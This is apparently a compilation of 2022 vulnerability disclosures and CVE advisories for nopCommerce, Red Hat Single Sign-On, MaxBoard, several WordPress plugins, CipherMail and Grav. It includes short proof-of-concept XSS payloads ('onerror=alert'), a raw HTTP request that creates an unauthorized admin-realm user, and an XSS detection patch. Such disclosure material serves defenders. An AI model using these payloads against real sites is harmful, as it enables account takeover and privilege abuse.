nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). At Apply for vendor account feature, an attacker can upload an arbitrary file to the system.

    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="Name"
    
    pentester
    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="Email"
    
    phamtrungtintf1512@gmail.com
    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="Description"
    
    Unrestricted File Upload in Apply for vendor account feature
    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
    Content-Type: text/html
    
    <h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="apply-vendor"
    
    
    -----------------------------353170076619137176562598160618
    Content-Disposition: form-data; name="__RequestVerificationToken"
    
    CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
    -----------------------------353170076619137176562598160618--

CVE-2022-28449: Unrestricted File Upload in Apply for vendor account feature · Issue #6192 · nopSolutions/nopCommerce

nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). An attacker (role customer) can inject javascript code to First name or Last name at Customer Info.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28448: Stored XSS in customer name when customer accessed deny resource and redirect to login page · Issue #6191 · nopSolutions/nopCommerce

Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. It was possible to add users to the master realm even though no respective permission was granted.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-076 Product: Red Hat Single Sign-On Manufacturer: Red Hat, Inc. Affected Version(s): 7.5.0.GA Tested Version(s): 7.5.0.GA Vulnerability Type: Improper Authorization (CWE-285) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2021-12-08 Solution Date: To be determined Public Disclosure: 2022-02-10 CVE Reference: Not yet assigned Author of Advisory: Christian Dölling, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Red Hat Single Sign-On is a single sign-on solution. The manufacturer describes the product as follows (see \[1\]): "Red Hat Single Sign-On (RH-SSO) is based on the Keycloak project and enables you to secure your web applications by providing Web single sign-on (SSO) capabilities based on popular standards such as SAML 2.0, OpenID Connect and OAuth 2.0. The RH-SSO server can act as a SAML or OpenID Connect-based Identity Provider, mediating with your enterprise user directory or 3rd-party SSO provider for identity information and your applications via standards-based tokens." Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions they should not be allowed to perform. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: It was possible to add users to the master realm even though no respective permission was granted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The author was provided with a user account with administrative privileges in all realms but the master realm. Within the master realm, read-only permissions were granted. This was confirmed by the owner of the Red Hat Single Sign-On instance and was reflected by the fact that an "add user" button was available in all realms but the master realm. Nevertheless, when the author sent the following request to the server, the server responded as shown below. Request: POST /auth/admin/realms/master/users HTTP/1.1 Host: login-stage.customer.com Cookie: INGRESS\_SESSION\_ID=XXX User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Authorization: Bearer \[...\] Content-Length: 146 Origin: https://login-stage.customer.com Te: trailers Connection: close {"enabled":true,"attributes":{},"groups":\[\],"emailVerified":true,"username":"SySS PoC","email":"poc@cd.sy.gs","firstName":"SySS","lastName":"PoC"} Response: HTTP/1.1 201 Created Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://login-stage.customer.com Access-Control-Expose-Headers: Location Date: Tue, 07 Dec 2021 15:44:58 GMT Location: https://login-stage.customer.com/auth/admin/realms/master/users/f5436560-00d0-42db-8486-81db59e61612 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: Close Afterwards, the author was able to confirm the successful creation of the user in the web front end. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Check authorization on server before adding a new user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-07: Vulnerability discovered 2021-12-08: Vulnerability reported to manufacturer TBD: Patch released by manufacturer 2022-02-10: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Red Hat Single Sign-On https://access.redhat.com/products/red-hat-single-sign-on \[2\] SySS Security Advisory SYSS-2021-076 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Dölling of SySS GmbH. E-Mail: christian.doelling@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian\_D%C3%B6lling.asc Key Fingerprint: 5478 245B 07F7 11D8 89EB 4FF9 22CC 67D4 1729 49A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEVHgkWwf3EdiJ60/5Isxn1BcpSaIFAmIE6HUACgkQIsxn1Bcp SaKfbg/9GyOdyhl35vPAF2HA6EDO9jaSZGgePp9lfQIGUh5C+7J+ghGWMGLvE8jU /aB7UdK2MOnelYKeQkPskVFxJz4JT1iBXwOsSLiynHVMBZNENUsPtegiuxhmpS+N kRTEo7nf1/GF/vmnnZ8v2uUGLlmwvZDf4bjvHn2JZaiMtHyWcAmg0U8nuBdmdroM SgTHLnKPMMAlL1N/T1HnHzpH1fCEeyTF+PlTrKOMW7lhCovupfI49MuDU6aqCWMJ 9oD0din5mvfuR5S3xdeYRH9rrkW/nR3KNie8yiDQfghCXCXBPrJdt/zIIjxKV2Pq Gf5YDcApCfWxyjzuoi0WjZMTCV058k6o42YeRdlfA9+DGIKczE4bUZSUR3TSgbpW OfstVjm0JXGfnGpT3b3tAY4KPFxz7ZFmIFD16mm5JLaVSh1/dNSgLN0oiw7cjjgw qiebrjEH8zroJ6DYTMbZRm+7ILgxPhYt1b4vNYrb7HhuvYvaeKgDekKL6rl3LZsn sqxzyAN+4/cph1feBKX+2kq8b0xGg+7cY6eXDfPk0/7Fd30DiLi0Z0GiK1ylmTb1 oJCg8XXqvoV3DNfTko6yXypdltiEnE0h1uzRcmd94an/r3JjEPgXca9O+1mQPaF+ KS1kfkQIV0Z+1gbExlwsnRdq7d+naCPaYJ3lb28lvjXoL5Eb5HM= =3Tj7 -----END PGP SIGNATURE-----

CVE-2022-1466

Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges. When uploading file in a specific menu, the verification of the files is insufficient. It allows remote attackers to upload arbitrary files disguising them as image files.

**Security Advisory**

 

CVE-2021-26628 | MaxBoard XSS and File Upload Vulnerability2022.04.26

□ Overview  
 o MaxBoard released security update to address XSS and File Upload vulnerability in admin page of MaxBoard.

Vulnerability

Vulnerability Type

Impact

Severity

CVSS Score

CVE ID

XSS and File Upload

remote code execution,  
privilege escalation

High

8.8

CVE-2021-26628

  
□ Description  
 o Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges.  
 o When uploading file in a specific menu, the verification of the files is insufficient. It allows remote attackers to upload arbitrary files  
disguising them as image files.

□ Affected Product

Affected Product

Product

Version

Platform

MaxBoard

prior of 1.9.6

Linux

  
□ Solution  
 o Update software over MaxBoard 1.9.6.1 version or higher.

□ Reference  
 \[1\] https://maxb.kr/

□ Etc  
 o Thanks to Song Inbong for reporting this vulnerability.

□ 작성 : 침해사고분석단 취약점분석팀

트위터 페이스북

CVE-2021-26628: KISA 인터넷 보호나라&KrCERT

Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress possible for users with contributor or higher user rights.

**wp-testing**

**Software**

**Psychological tests & quizzes**

**Vulnerable Versions**

**<= 0.21.19**

**Fixed in version**

**CVE**

**CVE-2021-36867**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-04-26**

**CVSS 3.0 score**

**Requires contributor or higher role user authentication.**

**Plugin does not exist, is not supported or discontinued.**

**Are your websites subject to this vulnerability?**

**Details**

**Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by Ngo Van Thien (Patchstack Alliance) in WordPress Psychological tests & quizzes plugin (versions <= 0.21.19).**

**Solution**

**No patched version.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2021-36867: WordPress Psychological tests & quizzes plugin <= 0.21.19 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress possible for users with contributor or higher role via &wpt_test_page_submit_button_caption parameter.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of April 26, 2022 and is not available for download. This closure is temporary, pending a full review.

![](https://secure.gravatar.com/avatar/4b86265be07d2b470a76420fa237b899?s=60&d=retro&r=g)

There is no better plugin than this for this domain.

![](https://secure.gravatar.com/avatar/3652ada8e3ab4497e4960f6d344929e0?s=60&d=retro&r=g)

The plug-in is very good, but there are some incompatibilities. such as Incompatible with the theme's label cloud, resulting in no color display. This is a very powerful WP plug-in I've seen. If the page of submitting results can be displayed, for example; Gender, age, test time and date, that's more perfect

![](https://secure.gravatar.com/avatar/f99995e094d67b5ceeff6b661cc04a5d?s=60&d=retro&r=g)

It works excellent, I would add the possibility of doing mathematical calculations not as conditionals but to obtain numerical results, to do tests that require simple calculations such as: Quality\_of\_life = (anxiety + depression + work) / 2 Then: If: quality\_of\_life> = 5 then: Quality of life: Good

![](https://secure.gravatar.com/avatar/4a8793793a78b222ddaaa69822b40515?s=60&d=retro&r=g)

This is a great plugin I have seen ever, But if getting more updates will be more fantastic

![](https://secure.gravatar.com/avatar/365c3a86e210d343807a9941e85defee?s=60&d=retro&r=g)

I have used this plugin now for several different tests/quizzes - some simple ones and one very complex one with a lot of customization. Works like a dream!

![](https://secure.gravatar.com/avatar/45cb0397d670d0b3fe240cf48b508b2f?s=60&d=retro&r=g)

Does a fantastic job of a complex situation. Is a bit tricky to setup, but allows a number of ways to configure tests/assessments and matched our need very well.

Read all 103 reviews

“Psychological tests & quizzes” is open source software. The following people have contributed to this plugin.

Contributors

CVE-2022-27854: Psychological tests & quizzes

Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload.

CVE-2021-36895: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

An issue was discovered in CipherMail Webmail Messenger 1.1.1 through 4.1.4. A local attacker could access secret keys (found in a Roundcube configuration file) that are used to protect Webmail user passwords and two-factor authentication (2FA).

CVE-2022-28218: Webmail Messenger release notes - CipherMail Email Encryption

stored xss in GitHub repository getgrav/grav prior to 1.7.33.

@@ -219,7 +219,8 @@ public static function detectXss($string, array $options = null): ?string $string = html\_entity\_decode($string, ENT\_NOQUOTES | ENT\_HTML5, 'UTF-8');  
// Strip whitespace characters $string = preg\_replace('!\\s!u', '', $string); $string = preg\_replace('!\\s!u', ' ', $string); $stripped = preg\_replace('!\\s!u', '', $string);  
// Set the patterns we'll test against $patterns = \[ @@ -242,7 +243,7 @@ public static function detectXss($string, array $options = null): ?string // Iterate over rules and return label if fail foreach ($patterns as $name => $regex) { if (!empty($enabled\_rules\[$name\])) { if (preg\_match($regex, $string) || preg\_match($regex, $orig)) { if (preg\_match($regex, $string) || preg\_match($regex, $stripped) || preg\_match($regex, $orig)) { return $name; } }

CVE-2022-1173: Fixed XSS check not detecting onX events without quotes · getgrav/grav@1c0ed43

WordPress Coru LFMember plugin version 1.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Coru LFMember - Stored Cross SiteScripting# Date: 26-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/# Version: 1.0.2# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:```<td class="manage-column"><input type="text" value="<?php print$result['game_image'] ?>" name="game_image[]" /></td><td class="manage-column"><?php printstripslashes($result['game_name_short']) ?></td><td class="manage-column"><input type="text" value="<?php printstripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td><td class="manage-column"><textarea name="game_description[]" rows="4"cols="10"><?php print stripslashes($result['game_description'])?></textarea></td><td class="manage-column"><input type="text" value="<?php print$result['game_link'] ?>" name="game_link[]" /></td>```# POC1. Install the Coru LFMember WordPress plugin and activate it.2. Go to LFMember -> Add New and inject XSS payload “><img src=xonerror=alert(1)> in the fields given i.e, Game Image Name, Game ShortName, Game Long Name, Game Description, and Links to.3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/kZDtIVz

Tag

#xss